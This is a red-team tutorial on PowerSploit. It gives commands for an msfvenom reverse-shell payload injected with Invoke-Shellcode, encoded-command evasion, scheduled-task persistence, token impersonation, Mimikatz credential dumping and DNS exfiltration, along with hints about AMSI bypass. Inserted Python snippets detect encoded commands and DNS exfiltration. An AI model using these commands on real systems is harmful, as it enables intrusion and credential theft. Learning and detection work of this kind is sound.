⚠️ Note: PowerSploit is no longer actively maintained and many of its modules are easily detected by modern EDR and antivirus solutions. It remains a valuable tool for learning and experimentation but may require customization or obfuscation to be usable in real-world red team engagements.

Greetings, fellow red teamers and penetration testers! In today’s highly interconnected world, offensive security has evolved significantly. With new tools and techniques appearing regularly, staying ahead of the curve is essential. One powerful framework that continues to hold educational value is PowerSploit—a collection of PowerShell modules for offensive security operations.

In this article, we’ll dive into PowerSploit, explore its capabilities, and provide real-world examples to help you sharpen your offensive tradecraft. Let’s get into it.

What is PowerSploit?

PowerSploit is an open-source project developed by security researchers and enthusiasts. It’s a collection of PowerShell scripts and modules designed to support red teamers and penetration testers in post-exploitation, privilege escalation, persistence, and recon tasks. Its strength lies in flexibility and ease of use in Windows environments—especially where PowerShell is already present.

While the tool is aging and not stealthy out of the box, it remains useful for learning offensive PowerShell concepts and for testing detection capabilities.

Setting up PowerSploit

To get started with PowerSploit:

  1. Clone the GitHub repository:

    git clone https://github.com/PowerShellMafia/PowerSploit.git

  2. Import the desired module in PowerShell:

    cd PowerSploit
    Import-Module .\Exfiltration\Invoke-Mimikatz.ps1

💡 You can also download and import individual scripts from the GitHub repo if you prefer not to clone the full project.

PowerSploit Modules

PowerSploit is divided into six main module categories:

  • Code Execution
  • Script Modification
  • Persistence
  • Privilege Escalation
  • Reconnaissance
  • Exfiltration

Let’s look at each category in detail.


🧨 Code Execution

These modules allow you to execute arbitrary code on a target system.

  • Invoke-Shellcode: Injects shellcode into memory.
  • Invoke-DllInjection: Injects a DLL into a running process.
  • Invoke-ReflectivePEInjection: Reflectively loads PE files into memory (DLL/EXE), avoiding disk writes.

Example: Deploying a Reverse Shell

Generate shellcode using msfvenom:

    msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.10 LPORT=443 -f powershell

Then execute it:

    Invoke-Shellcode -Shellcode 'YOUR_GENERATED_SHELLCODE' -Force

⚠️ Shellcode execution via PowerShell is easily detected by modern EDR tools. This is best used for learning or in controlled labs.


🧪 Script Modification

These modules help evade AV and execution policies.

  • Out-EncodedCommand: Encodes a command for powershell.exe -EncodedCommand.
  • Out-CompressedDll: Compresses DLLs for use with reflective loaders.

Example: Encoded Execution

    $command = 'Get-Process'
    $encodedCommand = Out-EncodedCommand -Command $command
    powershell.exe -EncodedCommand $encodedCommand

⚠️ EncodedCommand is a well-known bypass and flagged in most environments. This example is for educational purposes only.
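A defender-side counterpart to the encoded-command trick above, added here as an example and not part of PowerSploit: it decodes the base64/UTF-16LE payload that powershell.exe's -EncodedCommand switch expects (as seen in process-creation events, Event ID 4688) and matches both that text and script block logging text (Event ID 4104) against the PowerSploit cmdlet names listed in this article. The sample events and the event field layout are constructed assumptions.

```python
import base64
import re
from typing import Optional

# Cmdlet names taken from the module overview in this article.
POWERSPLOIT_CMDLETS = {
    "Invoke-Shellcode", "Invoke-DllInjection", "Invoke-ReflectivePEInjection", "Out-EncodedCommand",
    "Out-CompressedDll", "New-UserPersistenceOption", "New-ElevatedPersistenceOption", "Out-DnsTxt",
    "Invoke-TokenManipulation", "Get-NetUser", "Get-NetComputer", "Get-NetShare", "Invoke-Mimikatz",
    "Invoke-PowerDump",
}
_BY_LOWER = {c.lower(): c for c in POWERSPLOIT_CMDLETS}

# powershell.exe takes -EncodedCommand (abbreviated -ec, -enc or -e) followed by base64 of the
# UTF-16LE script text, so the script never appears in plain text on the command line.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
CMDLET_RE = re.compile(r"\b(?:Invoke|Out|New|Get)-[A-Za-z]+\b", re.IGNORECASE)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decoded -EncodedCommand payload, or None when absent or not valid base64/UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def find_powersploit_cmdlets(text: str) -> list:
    """PowerSploit cmdlet names found in a script block or command line (case-insensitive)."""
    return sorted({_BY_LOWER[t.lower()] for t in CMDLET_RE.findall(text) if t.lower() in _BY_LOWER})

def triage(event: dict) -> dict:
    """Decode (4688 process creation) and match one event; 4104 script blocks are already plain text."""
    decoded = decode_encoded_command(event["text"]) if event["id"] == 4688 else None
    hits = set(find_powersploit_cmdlets(event["text"]))
    if decoded:
        hits.update(find_powersploit_cmdlets(decoded))
    return {"id": event["id"], "decoded": decoded, "hits": sorted(hits), "alert": bool(hits)}

# Constructed sample events, not real telemetry; the second one carries a genuine encoding of
# "Get-NetUser -Filter *" built here so the example is self-contained.
SAMPLE_EVENTS = [
    {"id": 4104, "text": "Invoke-Mimikatz"},
    {"id": 4688, "text": "powershell.exe -NoP -Enc "
        + base64.b64encode("Get-NetUser -Filter *".encode("utf-16-le")).decode()},
    {"id": 4688, "text": "powershell.exe -NoProfile -Command Get-Process"},
]

def scan(events=SAMPLE_EVENTS) -> list:
    """Only events naming a PowerSploit cmdlet are returned, as a SIEM rule would emit them."""
    return [r for r in map(triage, events) if r["alert"]]
```

The same decoding step is what lets script block logging and command-line auditing see through the encoded-command example above, which is why it is flagged so reliably.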


🛡️ Persistence

Maintain access after initial compromise.

  • New-UserPersistenceOption: User-level persistence (startup folder, registry).
  • New-ElevatedPersistenceOption: System-level persistence (services, scheduled tasks).

Example: Daily Scheduled Task

    New-UserPersistenceOption -Command "powershell.exe -Command 'YOUR_PAYLOAD_COMMAND'" -Frequency Daily -At "12:00"

🚩 Privilege Escalation

Gain higher privileges on a compromised host.

  • Invoke-TokenManipulation: Lists and impersonates access tokens.
  • PowerUp: Scans for common privilege escalation opportunities.

Example: Token Impersonation

First, enumerate impersonation candidates:

    Invoke-TokenManipulation -Enumerate

Then impersonate a token:

    Invoke-TokenManipulation -Impersonate

🎯 There is no -Username parameter. The module impersonates based on available tokens.


🕵️ Reconnaissance

Gather info about the environment.

  • Get-NetUser: Lists domain users.
  • Get-NetComputer: Lists computers in the domain.
  • Get-NetShare: Lists shared folders.

Example: Enumerate Domain Users

    Get-NetUser -Filter *

📤 Exfiltration

Extract data stealthily.

  • Invoke-Mimikatz: Extracts credentials from memory.
  • Invoke-PowerDump: Dumps local SAM password hashes.
  • Out-DnsTxt: Exfiltrates data via DNS TXT records.

Example: DNS Exfiltration

    Out-DnsTxt -Data "SENSITIVE_DATA" -DnsServer "YOUR_DNS_SERVER"

🛑 EDRs will often block or detect this activity unless heavily obfuscated or tunneled.
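On the detection side of the DNS exfiltration described above, an added example that is not PowerSploit code: a heuristic over constructed resolver log lines that flags TXT queries whose leftmost label is long and high-entropy, as encoded data chunks are, and reports source hosts that repeat such queries against one zone. The log line format, the thresholds and the example-exfil.test zone are assumptions.

```python
import math
import re
from collections import defaultdict

# Constructed log lines in a simplified resolver-log layout (not from a real resolver).
# The three long labels from 10.0.0.5 are hex-encoded chunks; _dmarc is an ordinary TXT lookup.
SAMPLE_DNS_LOG = """\
2024-05-01T10:00:01 src=10.0.0.5 qtype=TXT qname=4a6f686e20446f652c2053534e2031323300.s1.example-exfil.test
2024-05-01T10:00:02 src=10.0.0.5 qtype=TXT qname=3132342d35362d3738393020756e616d653a.s2.example-exfil.test
2024-05-01T10:00:03 src=10.0.0.5 qtype=TXT qname=61646d696e2070617373776f72643a207365.s3.example-exfil.test
2024-05-01T10:00:04 src=10.0.0.7 qtype=TXT qname=_dmarc.example.test
2024-05-01T10:00:05 src=10.0.0.7 qtype=A qname=www.example.test
"""

LINE_RE = re.compile(r"src=(\S+) qtype=(\S+) qname=(\S+)")
MIN_LABEL_LEN = 24   # encoded data chunks are long; legitimate host labels rarely are
MIN_ENTROPY = 3.0    # bits per character of the leftmost label (hex tops out at 4.0)
MIN_QUERIES = 3      # repeated odd TXT lookups from one host to one zone

def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data scores far higher than ordinary host labels."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def suspicious_txt_query(qtype: str, qname: str) -> bool:
    """True for a TXT query whose leftmost label looks like an encoded data chunk."""
    label = qname.split(".")[0]
    return (qtype.upper() == "TXT" and len(label) >= MIN_LABEL_LEN
            and shannon_entropy(label) >= MIN_ENTROPY)

def find_dns_exfil(log_text: str) -> dict:
    """Map (source host, zone) -> number of suspicious TXT queries, kept when >= MIN_QUERIES."""
    per_pair = defaultdict(int)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        src, qtype, qname = m.groups()
        if suspicious_txt_query(qtype, qname):
            zone = ".".join(qname.split(".")[-2:])  # registrable zone, e.g. example-exfil.test
            per_pair[(src, zone)] += 1
    return {pair: n for pair, n in per_pair.items() if n >= MIN_QUERIES}
```

Thresholds like these are a starting point to tune against your own resolver baseline, since CDNs and some mail or certificate validation records also produce long TXT labels.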


Real-World Use Cases

Here are a few situations where PowerSploit can be integrated into a red team workflow:

🔒 Privilege Escalation via Tokens

    Invoke-TokenManipulation -Enumerate
    Invoke-TokenManipulation -Impersonate

Use after initial compromise to move laterally or elevate privileges.

🕸️ Lateral Movement with PowerShell Remoting

    Get-NetComputer -Filter *
    Enter-PSSession -ComputerName "TARGET_COMPUTER"

Requires PSRemoting to be enabled and accessible.

🧬 Credential Dumping with Mimikatz

    Invoke-Mimikatz

⚠️ Detected instantly in modern environments. Use AMSI bypass or load via obfuscated stager if testing defenses.


Final Thoughts

PowerSploit remains one of the most instructive frameworks for understanding offensive PowerShell. While its techniques are dated in some areas, its modular approach and code clarity make it an outstanding training and testing resource.

For real-world operations, expect to modify, obfuscate, and combine PowerSploit modules with custom tradecraft or C2 frameworks like Empire, Covenant, or Cobalt Strike.

Explore, adapt, and test—always in a legal and ethical environment.

Stay sharp out there, and good hunting.